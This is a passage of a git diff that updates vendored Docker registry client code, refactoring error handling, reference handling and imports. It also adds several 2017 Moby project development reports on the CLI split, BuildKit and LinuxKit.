"crypto/sha512" "encoding/hex" @@ -17,22 +15,26 @@ import ( "net/url" "strconv" "strings" + "sync" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/tarsum" - "github.com/docker/docker/reference" + "github.com/docker/docker/registry/resumable" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( // ErrRepoNotFound is returned if the repository didn't exist on the // remote side - ErrRepoNotFound = errors.New("Repository not found") + ErrRepoNotFound notFoundError = "Repository not found" ) // A Session is used to communicate with a V1 registry @@ -226,7 +228,7 @@ func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) { if res.StatusCode == 401 { return nil, errcode.ErrorCodeUnauthorized.WithArgs() } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) + return nil, newJSONError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) } var history []string @@ -246,7 +248,7 @@ func (r *Session) LookupRemoteImage(imgID, registry string) error { } res.Body.Close() if res.StatusCode != 200 { - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + return newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) } return nil } @@ -259,7 +261,7 @@ func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, err } defer res.Body.Close() if res.StatusCode != 200 { - return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + return nil, -1, newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) } // if the size header is not present, then set it to '-1' imageSize := int64(-1) @@ -290,7 +292,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io if err != nil { return nil, fmt.Errorf("Error while getting from the server: %v", err) } - statusCode = 0 + res, err = r.client.Do(req) if err != nil { logrus.Debugf("Error contacting registry %s: %v", registry, err) @@ -313,7 +315,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 { logrus.Debug("server supports resume") - return httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil + return resumable.NewRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil } logrus.Debug("server doesn't support resume") return res.Body, nil @@ -324,7 +326,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io // argument, and returns data from the first one that answers the query // successfully. func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) { - repository := repositoryRef.RemoteName() + repository := reference.Path(repositoryRef) if strings.Count(repository, "/") == 0 { // This will be removed once the registry supports auto-resolution on @@ -362,7 +364,7 @@ func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Name // the first one that answers the query successfully. It returns a map with // tag names as the keys and image IDs as the values. func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) { - repository := repositoryRef.RemoteName() + repository := reference.Path(repositoryRef) if strings.Count(repository, "/") == 0 { // This will be removed once the registry supports auto-resolution on @@ -416,7 +418,7 @@ func buildEndpointsList(headers []string, indexEp string) ([]string, error) { // GetRepositoryData returns lists of images and endpoints for the repository func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) { - repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName()) + repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), reference.Path(name)) logrus.Debugf("[registry] Calling GET %s", repositoryTarget) @@ -433,7 +435,7 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro // "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout" // was a top search on the docker user forum if isTimeout(err) { - return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget) + return nil, fmt.Errorf("network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy", repositoryTarget) } return nil, fmt.Errorf("Error while pulling image: %v", err) } @@ -444,13 +446,13 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro // TODO: Right now we're ignoring checksums in the response body. // In the future, we need to use them to check image validity. if res.StatusCode == 404 { - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) + return nil, newJSONError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) } else if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, reference.Path(name), errBody), res) } var endpoints []string @@ -537,12 +539,12 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist } defer res.Body.Close() if res.StatusCode == 401 && strings.HasPrefix(registry, "http://") { - return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res) + return newJSONError("HTTP code 401, Docker will not send auth headers over HTTP.", res) } if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) } var jsonBody map[string]string if err := json.Unmarshal(errBody, &jsonBody); err != nil { @@ -550,7 +552,7 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist } else if jsonBody["error"] == "Image already exists" { return ErrAlreadyExists } - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) + return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) } return nil } @@ -591,9 +593,9 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { - return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + return "", "", newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) } - return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) + return "", "", newJSONError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) } checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil)) @@ -605,7 +607,7 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error { // "jsonify" the string revision = "\"" + revision + "\"" - path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag) + path := fmt.Sprintf("repositories/%s/tags/%s", reference.Path(remote), tag) req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision)) if err != nil { @@ -619,7 +621,7 @@ func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registr } res.Body.Close() if res.StatusCode != 200 && res.StatusCode != 201 { - return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res) + return newJSONError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, reference.Path(remote)), res) } return nil } @@ -645,7 +647,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if validate { suffix = "images" } - u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix) + u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), reference.Path(remote), suffix) logrus.Debugf("[registry] PUT %s", u) logrus.Debugf("Image list pushed to index:\n%s", imgListJSON) headers := map[string][]string{ @@ -683,7 +685,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, reference.Path(remote), errBody), res) } tokens = res.Header["X-Docker-Token"] logrus.Debugf("Auth token: %v", tokens) @@ -701,7 +703,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, reference.Path(remote), errBody), res) } } @@ -733,40 +735,27 @@ func shouldRedirect(response *http.Response) bool { // SearchRepositories performs a search against the remote repository func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) { if limit < 1 || limit > 100 { - return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit) + return nil, errdefs.InvalidParameter(errors.Errorf("Limit %d is outside the range of [1, 100]", limit)) } logrus.Debugf("Index server: %s", r.indexEndpoint) u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit)) req, err := http.NewRequest("GET", u, nil) if err != nil { - return nil, fmt.Errorf("Error while getting from the server: %v", err) + return nil, errors.Wrap(errdefs.InvalidParameter(err), "Error building request") } // Have the AuthTransport send authentication, when logged in. req.Header.Set("X-Docker-Token", "true") res, err := r.client.Do(req) if err != nil { - return nil, err + return nil, errdefs.System(err) } defer res.Body.Close() if res.StatusCode != 200 { - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) + return nil, newJSONError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) } result := new(registrytypes.SearchResults) - return result, json.NewDecoder(res.Body).Decode(result) -} - -// GetAuthConfig returns the authentication settings for a session -// TODO(tiborvass): remove this once registry client v2 is vendored -func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig { - password := "" - if withPasswd { - password = r.authConfig.Password - } - return &types.AuthConfig{ - Username: r.authConfig.Username, - Password: password, - } + return result, errors.Wrap(json.NewDecoder(res.Body).Decode(result), "error decoding registry search results") } func isTimeout(err error) bool { @@ -781,3 +770,10 @@ func isTimeout(err error) bool { t, ok := e.(timeout) return ok && t.Timeout() } + +func newJSONError(msg string, res *http.Response) error { + return &jsonmessage.JSONError{ + Message: msg, + Code: res.StatusCode, + } +} diff --git a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go index 49c123a3e2..28ed2bfa5e 100644 --- a/vendor/github.com/docker/docker/registry/types.go +++ b/vendor/github.com/docker/docker/registry/types.go @@ -1,19 +1,16 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "github.com/docker/distribution/reference" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" ) -// RepositoryData tracks the image list, list of endpoints, and list of tokens -// for a repository +// RepositoryData tracks the image list, list of endpoints for a repository type RepositoryData struct { // ImgList is a list of images in the repository ImgList map[string]*ImgData // Endpoints is a list of endpoints returned in X-Docker-Endpoints Endpoints []string - // Tokens is currently unused (remove it?) - Tokens []string } // ImgData is used to transfer image checksums to and from the registry @@ -60,7 +57,7 @@ var apiVersions = map[APIVersion]string{ // RepositoryInfo describes a repository type RepositoryInfo struct { - reference.Named + Name reference.Named // Index points to registry information Index *registrytypes.IndexInfo // Official indicates whether the repository is considered official. diff --git a/vendor/github.com/docker/docker/reports/2017-05-01.md b/vendor/github.com/docker/docker/reports/2017-05-01.md new file mode 100644 index 0000000000..366f4fce70 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-01.md @@ -0,0 +1,35 @@ +# Development Report for May 01, 2017 + +This is the 1st report, since the Moby project was announced at DockerCon. Thank you to everyone that stayed an extra day to attend the summit on Thursday. + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com/) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The moby tool + +The moby tool currently lives at [https://github.com/moby/tool](https://github.com/moby/tool), it's only a temporary place and will soon be merged in [https://github.com/moby/moby](https://github.com/moby/moby). + +### The CLI split + +Ongoing work to split the Docker CLI into [https://github.com/docker/cli](https://github.com/docker/cli) is happening [here](https://github.com/moby/moby/pull/32694). +We are almost done, it should be merged soon. + +### Mailing list + +Slack works great for synchronous communication, but we need to place for async discussion. A mailing list is currently being setup. + +### Find a good and non-confusing home for the remaining monolith + +Lots of discussion and progress made on this topic, see [here](https://github.com/moby/moby/issues/32871). The work will start this week. + +## Componentization + +So far only work on the builder happened regarding the componentization effort. + +### builder + +The builder dev report can be found [here](builder/2017-05-01.md) diff --git a/vendor/github.com/docker/docker/reports/2017-05-08.md b/vendor/github.com/docker/docker/reports/2017-05-08.md new file mode 100644 index 0000000000..7f03335416 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-08.md @@ -0,0 +1,34 @@ +# Development Report for May 08, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The CLI split + +The Docker CLI was successfully moved to [https://github.com/docker/cli](https://github.com/docker/cli) last week thanks to @tiborvass +The Docker CLI is now compiled from the [Dockerfile](https://github.com/moby/moby/blob/a762ceace4e8c1c7ce4fb582789af9d8074be3e1/Dockerfile#L248) + +### Mailing list + +Discourse is available at [forums.mobyproject.org](https://forums.mobyproject.org/) thanks to @thaJeztah. mailing-list mode is enabled, so once you register there, you will received every new threads / messages via email. So far, 3 categories were created: Architecture, Meta & Support. The last step missing is to setup an email address to be able to start a new thread via email. + +### Find a place for `/pkg` + +Lots of discussion and progress made on this [topic](https://github.com/moby/moby/issues/32989) thanks to @dnephin. [Here is the list](https://gist.github.com/dnephin/35dc10f6b6b7017f058a71908b301d38) proposed to split/reorganize the pkgs. + +### Find a good and non-confusing home for the remaining monolith + +@cpuguy83 is leading the effort [here](https://github.com/moby/moby/pull/33022). It's still WIP but the way we are experimenting with is to reorganise directories within the moby/moby. + +## Componentization + +So far only work on the builder, by @tonistiigi, happened regarding the componentization effort. + +### builder + +The builder dev report can be found [here](builder/2017-05-08.md) + diff --git a/vendor/github.com/docker/docker/reports/2017-05-15.md b/vendor/github.com/docker/docker/reports/2017-05-15.md new file mode 100644 index 0000000000..7556f9cc4a --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-15.md @@ -0,0 +1,52 @@ +# Development Report for May 15, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The CLI split + +Work is in progress to move the "opts" package to the docker/cli repository. The package, was merged into the docker/cli +repository through [docker/cli#82](https://github.com/docker/cli/pull/82), preserving Git history, and parts that are not +used in Moby have been removed through [moby/moby#33198](https://github.com/moby/moby/pull/33198). + +### Find a good and non-confusing home for the remaining monolith + +Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved +from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith/37) + +### Find a place for `/pkg` + +Concerns were raised about moving packages to separate repositories, and it was decided to put some extra effort into +breaking up / removing existing packages that likely are not good candidates to become a standalone project. + +### Update integration-cli tests + +With the removal of the CLI from the moby repository, new pull requests will have to be tested using API tests instead +of using the CLI. Discussion took place whether or not these tests should use the API `client` package, or be completely +independent, and make raw HTTP calls. + +A topic was created on the forum to discuss options: [evolution of testing](https://forums.mobyproject.org/t/evolution-of-testing-moby/38) + + +### Proposal: split & containerize hack/validate + +[@AkihiroSuda](https://github.com/AkihiroSuda) is proposing to split and containerize the `hack/validate` script and +[started a topic on the forum](https://forums.mobyproject.org/t/proposal-split-containerize-hack-validate/32). An initial +proposal to add validation functionality to `vndr` (the vendoring tool in use) was rejected upstream, so alternative +approaches were discussed. + + +### Special Interest Groups + +A "SIG" category was created on the forums to provide a home for Special Interest Groups. The first SIG, [LinuxKit +Security](https://forums.mobyproject.org/t/about-the-linuxkit-security-category/44) was started (thanks +[@riyazdf](https://github.com/riyazdf)). + + +### Builder + +The builder dev report can be found [here](builder/2017-05-15.md) diff --git a/vendor/github.com/docker/docker/reports/2017-06-05.md b/vendor/github.com/docker/docker/reports/2017-06-05.md new file mode 100644 index 0000000000..63679ed033 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-05.md @@ -0,0 +1,36 @@ +# Development Report for June 5, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +Lots of discussion happened during this meeting to kickstart the project, but now that we have the forums, we see less activity there. +We are discussing the future of this meeting [here](https://forums.mobyproject.org/t/of-standups-future), we will possibility move the meeting +to weekly. + +## Topics discussed last week + +### The CLI split + +Thanks to @tiborvass, the man pages, docs and completion scripts were imported to `github.com/docker/cli` [last week](https://github.com/docker/cli/pull/147) +Once everything is finalised, we will remove them from `github.com/moby/moby` + +### Find a good and non-confusing home for the remaining monolith + +Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved +from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith) + + +### Find a place for `/pkg` + +Thanks to @dnephin this topic in on-going, you can follow progress [here](https://github.com/moby/moby/issues/32989) +Many pkgs were reorganised last week, and more to come this week. + + +### Builder + +The builder dev report can be found [here](builder/2017-06-05.md) + + +### LinuxKit + +The LinuxKit dev report can be found [here](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-03.md) diff --git a/vendor/github.com/docker/docker/reports/2017-06-12.md b/vendor/github.com/docker/docker/reports/2017-06-12.md new file mode 100644 index 0000000000..8aef38c6b0 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-12.md @@ -0,0 +1,78 @@ +# Development Report for June 12, 2017 + +## Moby Summit + +The next Moby Summit will be at Docker HQ on June 19th, register [here](https://www.eventbrite.com/e/moby-summit-tickets-34483396768) + +## Daily Meeting + +### The CLI split + +Manpages and docs yaml files can now be generated on [docker/cli](https://github.com/docker/cli). +Man pages, docs and completion scripts will be removed next week thanks to @tiborvass + +### Find a good and non-confusing home for the remaining monolith + +Lot's of dicussion happened on the [forums](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith) +We should expect to do those changes after the moby summit. We contacted github to work with them so we have a smooth move. + +### Moby tool + +`moby` tool docs were moved from [LinuxKit](https://github.com/linuxkit/linuxkit) to the [moby tool repo](https://github.com/moby/tool) thanks to @justincormack + +### Custom golang URLs + +More discussions on the [forums](https://forums.mobyproject.org/t/cutoms-golang-urls), no agreement for now. + +### Buildkit + +[Proposal](https://github.com/moby/moby/issues/32925) + +More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies. + +If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +#### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers. + +#### Long running session & incremental file sending + +[PR ](https://github.com/moby/moby/pull/32677) + +Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. + + +#### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. + +#### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +#### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +#### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. diff --git a/vendor/github.com/docker/docker/reports/2017-06-26.md b/vendor/github.com/docker/docker/reports/2017-06-26.md new file mode 100644 index 0000000000..e12533ae46 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-26.md @@ -0,0 +1,120 @@ +# Development Report for June 26, 2017 + +## Moby Summit + +The Moby Summit held in San Francisco was very active and well attended ([blog](http://mobyproject.org/blog/2017/06/26/moby-summit-recap/) / [linuxkit table notes](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-19-summit.md) [#2090](https://github.com/linuxkit/linuxkit/pull/2090) [#2033](https://github.com/linuxkit/linuxkit/pull/2033) [@mgoelzer] [@justincormack]). + +## Container Engine + +Thanks to @fabiokung there is no container locks anymore on `docker ps` [#31273](https://github.com/moby/moby/pull/31273) + +## BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +New development repo is open at https://github.com/moby/buildkit + +The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit. + +There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there. + +Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs. + +The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit). + +The PR had some review and updates in last week. Should be ready to code review soon. + +### Merged: Long running session & incremental file sending + +[PR](https://github.com/moby/moby/pull/32677) + +Incremental context sending PR was merged and is expected to land in `v17.07`. + +This feature experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, one first builder invocation full build context is sent to the daemon. On a second attempt, only the changed files are transferred. + +Previous build context is saved in the build cache, and you can see how much space it takes form `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`. + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735) + +### Builder features currently in code-review: + +[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696) + +[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824) + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. + +## LinuxKit + +* **Kernel GPG verification:** The kernel compilation containers now verify the GPG and SHA256 + checksums before building the binaries. ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [#2083](https://github.com/linuxkit/linuxkit/issues/2083) [@mscribe] [@justincormack] [@rn] [@riyazdf]). + The base Alpine build image now includes `gnupg` to support this feature ([#2091](https://github.com/linuxkit/linuxkit/issues/2091) [@riyazdf] [@rn]). + +* **Security SIG on Landlock:** The third Moby Security SIG focussed on the [Landlock](https://github.com/landlock-lsm) security module that provides unprivileged fine-grained sandboxing to applications. There are videos and forum links ([#2087](https://github.com/linuxkit/linuxkit/issues/2087) [#2089](https://github.com/linuxkit/linuxkit/issues/2089) [#2073](https://github.com/linuxkit/linuxkit/issues/2073) [@riyazdf]). + +* **Networking drivers now modules:** The kernels have been updated to 4.11.6/4.9.33/4.4.73, and many drivers are now loaded as modules to speed up boot-time ([#2095](https://github.com/linuxkit/linuxkit/issues/2095) [#2061](https://github.com/linuxkit/linuxkit/issues/2061) [@rn] [@justincormack] [@tych0]) + +- **Whaley important update:** The ASCII logo was updated and we fondly wave goodbye to the waves. ([#2084](https://github.com/linuxkit/linuxkit/issues/2084) [@thaJeztah] [@rn]) + +- **Containerised getty and sshd:** The login services now run in their own mount namespace, which was confusing people since they were expecting it to be on the host filesystem. This is now being addressed via a reminder in the `motd` upon login ([#2078](https://github.com/linuxkit/linuxkit/issues/2078) [#2097](https://github.com/linuxkit/linuxkit/issues/2097) [@deitch] [@ijc] [@justincormack] [@riyazdf] [@rn]) + +- **Hardened user copying:** The RFC on ensuring that we use a hardened kernel/userspace copying system was closed, as it is enabled by default on all our modern kernels and a regression test is included by default ([#2086](https://github.com/linuxkit/linuxkit/issues/2086) [@fntlnz] [@riyazdf]). + +- **Vultr provider:** There is an ongoing effort to add a metadata provider for [Vultr](http://vultr.com) ([#2101](https://github.com/linuxkit/linuxkit/issues/2101) [@furious-luke] [@justincormack]). + +### Packages and Projects + +- Simplified Makefiles for packages ([#2080](https://github.com/linuxkit/linuxkit/issues/2080) [@justincormack] [@rn]) +- The MirageOS SDK is integrating many upstream changes from dependent libraries, for the DHCP client ([#2070](https://github.com/linuxkit/linuxkit/issues/2070) [#2072](https://github.com/linuxkit/linuxkit/issues/2072) [@samoht] [@talex5] [@avsm]). + +### Documentation and Tests + +- A comprehensive test suite for containerd is now integrated into LinuxKit tests ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [@AkihiroSuda] [@justincormack] [@rn]) +- Fix documentation links ([#2074](https://github.com/linuxkit/linuxkit/issues/2074) [@ndauten] [@justincormack]) +- Update RTF version ([#2077](https://github.com/linuxkit/linuxkit/issues/2077) [@justincormack]) +- tests: add build test for Docker for Mac blueprint ([#2093](https://github.com/linuxkit/linuxkit/issues/2093) [@riyazdf] [@MagnusS]) +- Disable Qemu EFI ISO test for now ([#2100](https://github.com/linuxkit/linuxkit/issues/2100) [@justincormack]) +- The CI whitelists and ACLs were updated ([linuxkit-ci#11](https://github.com/linuxkit/linuxkit-ce/issues/11) [linuxkit-ci#15](https://github.com/linuxkit/linuxkit-ce/issues/15) [linuxkit/linuxkit-ci#10](https://github.com/linuxkit/linuxkit-ce/issues/10) [@rn] [@justincormack]) +- Fix spelling errors ([#2079](https://github.com/linuxkit/linuxkit/issues/2079) [@ndauten]) +- Fix typo in dev report ([#2094](https://github.com/linuxkit/linuxkit/issues/2094) [@justincormack]) +- Fix dead Link to VMWare File ([#2082](https://github.com/linuxkit/linuxkit/issues/2082) [@davefreitag]) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-01.md b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md new file mode 100644 index 0000000000..73d1c49303 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md @@ -0,0 +1,47 @@ +# Development Report for May 01, 2017 + +### buildkit + +As part of the goals of [Moby](https://github.com/moby/moby#transitioning-to-moby) to split the current platform into reusable components and to provide a future vision for the builder component new [buildkit proposal](https://github.com/moby/moby/issues/32925) was opened with early design draft. + +Buildkit is a library providing the core essentials of running a build process using isolated sandboxed commands. It is designed for extensibility and customization. Buildkit supports multiple build declaration formats(frontends) and multiple ways for outputting build results(not just docker images). It 